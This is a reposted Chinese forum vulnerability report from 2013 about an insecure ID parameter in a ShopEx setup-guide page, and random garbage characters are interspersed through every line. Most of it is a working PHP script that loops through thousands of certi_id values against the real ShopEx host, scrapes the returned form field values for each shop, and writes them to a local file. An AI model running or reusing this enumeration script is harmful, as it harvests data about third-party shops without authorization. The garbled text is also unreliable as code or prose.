|
|
简要描述:
7 X& j2 G4 B4 nShopEx某接口缺陷,可遍历所有网站0 m6 i3 g( Y! }3 I
详细说明:+ B% l# \' T# C+ n0 C) B
问题出现在shopex 网店使用向导页面 5 T7 _( |' x3 C% M5 y
# u7 H/ ]* o4 W7 e1 o; |
& o+ L. D) U9 t: o1 O6 Y6 q, Y, P4 J0 ~9 |- z x1 X8 z
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
" N: U0 {- [0 l2 V% m$ B: C7 }5 u( {$ u4 D. @5 E/ h: l3 Q0 _
3 i; z5 {: I$ O- h
- x% J6 a* Q' |' c& P `7 x
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}. @7 t% _$ i$ @. ?4 K; ]
/ }4 P4 v# ?! [1 ~
/ `8 J3 f+ h+ `$ }1 A
, Q3 B; K. ^6 W& I. s
我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
* m5 A9 e1 z" B2 R/ U8 N+ A7 R8 n2 F6 @, ]; z# {1 l' f7 N9 f; `9 n
' N. |( z" m9 h9 a: ~# E
+ k! I) Y% n8 Z, D
<?php
& m( V) \$ J K/ [9 ^& r, ^9 F7 t+ r+ ~8 k0 X5 @
for ($i=1; $i < 10000; $i++) { //遍历
6 G% t G) h" @1 o/ R5 Q+ m7 m5 b; A# n. f9 [
ShowshopExD($i);
" ^* S* ~5 I$ m. F) P
- {5 j( H7 ~, ~! L& f }4 q$ V$ T' F: \% i/ d4 F- [4 G
, j% M2 E+ ^ T: Y% C function ShowshopExD($cid) {
$ v* q- l& w3 W( v- t: T7 y
0 t0 T2 S) x; r4 e8 t) c0 k $url='http://guide.ecos.shopex.cn/step2.php';
: F- M/ G/ j u
9 L C: A+ o5 N% g# `, }1 N $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');$ p9 f. P( C' U; _3 l- h
" N T" T4 G5 ~% @! R, N $url = $url.'?refer='.$refer;
8 Z* P3 T: o6 K; c/ K9 n/ s4 q' v5 c% ~
$ch = curl_init($url);" l V" k7 S( {0 K: [
/ M9 R. P: M" Q7 O- A5 _ curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
- O! |. l3 @, X- V" k7 F4 q: j& ?+ Y4 v
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;4 E& p' e- s: ?) E/ v
2 }3 a8 u, J3 C& C1 H) I $result = curl_exec($ch);0 V: d& ?. m* M9 Y* G
( {; A/ d$ v; `, V $result = mb_convert_encoding($result, "gb2312", "UTF-8");
& W% A+ V4 i8 m) Q# h6 ? ]% ^# N; n- l4 p1 @& I# w/ x
if(strpos($result,$refer))
6 _! U6 N" l& U* u4 u- w5 }
& m$ P* r: q; k1 T$ t3 F# X {; T9 O! Q! Q4 g4 l
7 _9 j6 S, q! y: R
$fp = fopen("c:/shopEx.txt",'ab'); //保存文件4 G, S: V7 D$ J( q" `, S
+ y1 j" H1 g! K/ }! ^ f3 E) p preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);7 h& Z+ o- Q. k/ v! s+ m
3 U6 g1 X* _9 F1 N1 m9 [# R0 f% n3 S
foreach ($value[1] as $key) {* p! F2 @$ H" b( ?1 S: N
( s& G: b- p) m% D( n preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);( i5 j% b: G1 D: B ^
& |) R. E$ A4 R R; R- E7 X! _ echo $res[1][0].':'.$res[3][0]."\r\n";2 h9 [2 y% l4 r* R( R+ w
. U/ u' e9 u+ N, E
$col =$res[1][0].':'.$res[3][0]."\r\n"; c$ |" Q; V. u- }- v; F c" U
$ z* r6 u9 M% R, g) V1 h
fwrite($fp, $col, strlen($col));
0 B, u8 i" W2 o% r" w2 U" L
5 U+ m7 o& W0 q" t4 O2 T }' f& s$ h- @& u3 P! Z6 u5 H; Y
1 A( r/ T; v6 Y3 w m echo '--------------------------------'."\r\n";+ ~6 \- Y: [. c2 u
" }" A _% f7 H" ]& I% f# e
fclose($fp);
: [+ {6 \- j/ `/ k8 B W A* M
1 C" r$ x5 u" P4 K: `1 T" @3 } }5 S! q B2 {1 @% o! f9 d' \4 B3 C$ w
0 ?6 P0 \* K# o( t1 F flush();
. X6 Q+ i( g- `8 x7 Y4 F+ f6 ^
- B( G7 z J" t$ Q curl_close($ch);. m n4 u; |4 b, U: m6 t
0 A. M; w/ R/ _6 S
}
+ ^, y9 p( L- m9 @( w5 C. |) a" F l$ v% K
?>0 t! m. S6 j' p& K8 g' X( u S
漏洞证明:
% K7 _* w1 U* f, p: yhttp://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
, {9 Z$ p" d( P3 z9 Q* krefer换成其他加密方式
) n. S7 ]0 H* p3 C* U: K |
|
发表于 2013-9-21 15:59:47
收藏
支持
反对